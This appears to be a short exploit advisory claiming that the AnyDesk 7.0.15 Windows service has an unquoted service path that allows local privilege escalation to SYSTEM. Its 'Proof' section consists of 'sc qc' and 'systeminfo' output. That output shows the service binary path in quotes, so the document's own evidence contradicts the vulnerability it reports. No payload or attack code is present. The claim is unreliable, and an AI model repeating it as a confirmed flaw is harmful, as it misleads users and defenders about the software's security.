# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path Privilege Escalation # Date: 2024-04-01 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 7.0.15 # Tested on: Windows 10 Pro x64 1. Description: The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof C:\>sc qc anydesk [SC] QueryServiceConfig SUCCESS SERVICE_NAME: anydesk TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AnyDesk Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation